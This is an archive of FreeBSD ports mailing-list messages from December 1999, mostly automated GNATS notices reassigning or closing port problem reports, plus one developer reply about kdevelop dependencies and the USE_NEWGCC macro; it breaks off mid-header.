freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 25F601508C; Tue, 14 Dec 1999 21:03:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55519; Tue, 14 Dec 1999 21:03:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:03:50 -0800 (PST) From: Message-Id: <199912150503.VAA55519@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, markm@FreeBSD.org Subject: Re: ports/15102: pgp5 port is broken under -CURRENT Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pgp5 port is broken under -CURRENT Responsible-Changed-From-To: freebsd-ports->markm Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:03:22 PST 1999 Responsible-Changed-Why: Over to ports' maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 4:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 016FB14E7C; Tue, 14 Dec 1999 21:04:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55610; Tue, 14 Dec 1999 21:04:21 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:04:21 -0800 (PST) From: Message-Id: <199912150504.VAA55610@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, jmz@FreeBSD.org Subject: Re: ports/15108: The print/latex port is thrashing the distifiles directory Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: The print/latex port is thrashing the distifiles directory Responsible-Changed-From-To: freebsd-ports->jmz Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:03:56 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 4:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4D96A153A7; Tue, 14 Dec 1999 21:04:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55726; Tue, 14 Dec 1999 21:04:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:04:50 -0800 (PST) From: Message-Id: <199912150504.VAA55726@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, se@FreeBSD.org Subject: Re: ports/15118: wine-991114 once more Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: wine-991114 once more Responsible-Changed-From-To: freebsd-ports->se Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:04:34 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 5:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E98214CF4; Tue, 14 Dec 1999 21:05:17 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55837; Tue, 14 Dec 1999 21:05:17 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:05:17 -0800 (PST) From: Message-Id: <199912150505.VAA55837@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, jmz@FreeBSD.org Subject: Re: ports/15142: Added DIST_SUBDIR to print/tex port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Added DIST_SUBDIR to print/tex port Responsible-Changed-From-To: freebsd-ports->jmz Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:05:02 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 5:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 226551544C; Tue, 14 Dec 1999 21:05:54 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55958; Tue, 14 Dec 1999 21:05:54 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:05:54 -0800 (PST) From: Message-Id: <199912150505.VAA55958@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, mph@FreeBSD.org Subject: Re: ports/15155: update of p5-ReadLine-Perl to version 0.9907 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update of p5-ReadLine-Perl to version 0.9907 Responsible-Changed-From-To: freebsd-ports->mph Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:05:35 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 6:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B62915433; Tue, 14 Dec 1999 21:06:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56042; Tue, 14 Dec 1999 21:06:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:06:30 -0800 (PST) From: Message-Id: <199912150506.VAA56042@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, ache@FreeBSD.org Subject: Re: ports/15156: update of p5-URI to version 1.04 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update of p5-URI to version 1.04 Responsible-Changed-From-To: freebsd-ports->ache Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:06:04 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 7: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A475514F71; Tue, 14 Dec 1999 21:07:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56151; Tue, 14 Dec 1999 21:07:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:07:05 -0800 (PST) From: Message-Id: <199912150507.VAA56151@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, se@FreeBSD.org Subject: Re: ports/15157: [PATCH] Environment Botch in KDM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] Environment Botch in KDM Responsible-Changed-From-To: freebsd-ports->se Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:06:38 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 8: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 868AA15003; Tue, 14 Dec 1999 21:08:08 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56269; Tue, 14 Dec 1999 21:08:08 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:08:08 -0800 (PST) From: Message-Id: <199912150508.VAA56269@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, max@FreeBSD.org Subject: Re: ports/15184: ja-ptex-common-2.1.8 fails to execute on 3.3-RELEASE Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ja-ptex-common-2.1.8 fails to execute on 3.3-RELEASE Responsible-Changed-From-To: freebsd-ports->max Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:07:43 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 8:49 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D90614CF4; Tue, 14 Dec 1999 21:08:47 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56407; Tue, 14 Dec 1999 21:08:47 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:08:47 -0800 (PST) From: Message-Id: <199912150508.VAA56407@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15240: [PATCH] update xfce port to the 3.2.1 version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] update xfce port to the 3.2.1 version Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:08:20 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 9:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 22687152EA; Tue, 14 Dec 1999 21:09:21 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56499; Tue, 14 Dec 1999 21:09:20 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:09:20 -0800 (PST) From: Message-Id: <199912150509.VAA56499@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, ache@FreeBSD.org Subject: Re: ports/15326: tcsh modification Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: tcsh modification Responsible-Changed-From-To: freebsd-ports->ache Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:08:58 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 9:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD24314CF4; Tue, 14 Dec 1999 21:09:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56591; Tue, 14 Dec 1999 21:09:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:09:51 -0800 (PST) From: Message-Id: <199912150509.VAA56591@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, cwt@FreeBSD.org Subject: Re: ports/15329: amanda24 modification Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: amanda24 modification Responsible-Changed-From-To: freebsd-ports->cwt Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:09:33 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:10:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C0F2015523; Tue, 14 Dec 1999 21:10:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56830; Tue, 14 Dec 1999 21:10:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:10:24 -0800 (PST) From: Message-Id: <199912150510.VAA56830@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, billf@FreeBSD.org Subject: Re: ports/15387: ethereal's packet-smb.c calls str*() functions with NULL pointers Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ethereal's packet-smb.c calls str*() functions with NULL pointers Responsible-Changed-From-To: freebsd-ports->billf Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:10:05 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:11: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 699ED15433; Tue, 14 Dec 1999 21:11:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA56942; Tue, 14 Dec 1999 21:11:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:11:05 -0800 (PST) From: Message-Id: <199912150511.VAA56942@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, torstenb@FreeBSD.org Subject: Re: ports/15368: Update ftp/mirror Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update ftp/mirror Responsible-Changed-From-To: freebsd-ports->torstenb Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:10:47 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:11:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 923B415449; Tue, 14 Dec 1999 21:11:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA57049; Tue, 14 Dec 1999 21:11:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:11:51 -0800 (PST) From: Message-Id: <199912150511.VAA57049@freefall.freebsd.org> To: jedgar@fxp.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15124: Update port: security/portsentry Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: security/portsentry State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Tue Dec 14 21:11:26 PST 1999 State-Changed-Why: Update already committed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:13:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2D14E15513; Tue, 14 Dec 1999 21:13:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA57314; Tue, 14 Dec 1999 21:13:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:13:48 -0800 (PST) From: Message-Id: <199912150513.VAA57314@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15333: Update port: archivers/lzo Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: archivers/lzo State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Tue Dec 14 21:13:32 PST 1999 State-Changed-Why: Update already committed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:14:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 17EFE15591; Tue, 14 Dec 1999 21:14:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA57402; Tue, 14 Dec 1999 21:14:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:14:24 -0800 (PST) From: Message-Id: <199912150514.VAA57402@freefall.freebsd.org> To: jedgar@fxp.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15375: Update port: editors/bvi Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: editors/bvi State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Tue Dec 14 21:14:02 PST 1999 State-Changed-Why: Update already committed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 93AD8153DE for ; Tue, 14 Dec 1999 21:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA57747; Tue, 14 Dec 1999 21:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 21:20:03 -0800 (PST) Message-Id: <199912150520.VAA57747@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Ade Lovett Subject: Re: ports/15434: new port: devel/kdevelop Reply-To: Ade Lovett Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15434; it has been noted by GNATS. From: Ade Lovett To: "R. Imura" Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: ports/15434: new port: devel/kdevelop Date: Tue, 14 Dec 1999 23:11:31 -0600 On Tue, Dec 14, 1999 at 01:00:03PM -0800, R. Imura wrote: > > o The port depends on many other ports. Year, if they are installed, > kdevelop will be more power-full and we will be happy, but they are > not really **nessesary**. This port would be exceptionally well served by the optional dependencies code that Jeremy Lea has been working on. See -ports for more details. > o If you say it is BROKEN for -stable( < 400004), defining USE_NEWGCC > doesn't make any sense. (I know it may have a sence in the future.) > I thought it being funny. Actually, this reminds me.. the USE_NEWGCC macro in bsd.port.mk is now out of date, it needs to be altered to < 400012 which was when gcc-2.95.2 became the default -current compiler (rev 1.56 of sys/sys/param.h) There's a few ports out there that have hacks to use the right gcc that can be removed now we can get the same compiler on both -stable and -current. textproc/aspell springs to mind :) -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:25:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BECAD14C9C; Tue, 14 Dec 1999 21:25:35 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58180; Tue, 14 Dec 1999 21:25:35 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:25:35 -0800 (PST) From: Message-Id: <199912150525.VAA58180@freefall.freebsd.org> To: calle.madestrand@norrgarden.se, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15209: BitchX 1.0 IRC client port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: BitchX 1.0 IRC client port State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Tue Dec 14 21:24:36 PST 1999 State-Changed-Why: Superceded by ports/15212. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:31:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 92DBC1508C; Tue, 14 Dec 1999 21:31:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58699; Tue, 14 Dec 1999 21:31:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:31:43 -0800 (PST) From: Message-Id: <199912150531.VAA58699@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/6181: New port: xoj-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xoj-1.0 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:30:50 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:31:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 92DBC1508C; Tue, 14 Dec 1999 21:31:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58699; Tue, 14 Dec 1999 21:31:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:31:43 -0800 (PST) From: Message-Id: <199912150531.VAA58699@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/6181: New port: xoj-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xoj-1.0 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:30:50 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:32:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9084C15460; Tue, 14 Dec 1999 21:32:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58774; Tue, 14 Dec 1999 21:32:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:32:09 -0800 (PST) From: Message-Id: <199912150532.VAA58774@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/7485: New port: Xterminal-0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: Xterminal-0.2 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:31:50 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:32:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 811D71549E; Tue, 14 Dec 1999 21:32:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58858; Tue, 14 Dec 1999 21:32:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:32:34 -0800 (PST) From: Message-Id: <199912150532.VAA58858@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12204: Update port: graphics/EZWGL Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/EZWGL Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:32:16 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:32:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9084C15460; Tue, 14 Dec 1999 21:32:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58774; Tue, 14 Dec 1999 21:32:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:32:09 -0800 (PST) From: Message-Id: <199912150532.VAA58774@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/7485: New port: Xterminal-0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: Xterminal-0.2 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:31:50 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:32:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 811D71549E; Tue, 14 Dec 1999 21:32:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58858; Tue, 14 Dec 1999 21:32:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:32:34 -0800 (PST) From: Message-Id: <199912150532.VAA58858@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12204: Update port: graphics/EZWGL Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/EZWGL Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:32:16 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:33: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D9B1D1549E; Tue, 14 Dec 1999 21:32:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58945; Tue, 14 Dec 1999 21:32:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:32:53 -0800 (PST) From: Message-Id: <199912150532.VAA58945@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12835: New port: libcgic-1.06 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: libcgic-1.06 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve 